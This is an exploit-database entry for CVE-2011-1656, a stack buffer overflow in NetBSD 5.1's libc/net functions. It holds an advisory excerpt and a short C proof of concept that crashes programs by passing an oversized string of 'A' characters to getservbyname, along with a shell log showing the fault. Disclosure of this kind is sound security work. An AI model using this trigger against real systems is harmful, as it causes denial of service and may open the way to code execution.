NetBSD 5.1 - 'libc/net' Multiple Stack Buffer Overflows

Author: Maksymilian Arciemowicz
type: remote
platform: bsd
port: 
date_added: 2011-07-01  
date_updated: 2015-01-27  
verified: 1  
codes: CVE-2011-1656  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 35919.c  

// source: https://www.securityfocus.com/bid/48528/info

NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.

Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.

/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#


*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>

int main(int argc, char *argv[]){
	char *cycek;
	cycek=malloc(atoi(argv[1]));

	if(!cycek) return 1;
	memset(cycek,'A',atoi(argv[1]));

	getservbyname(cycek,"tcp");

	return 0;
}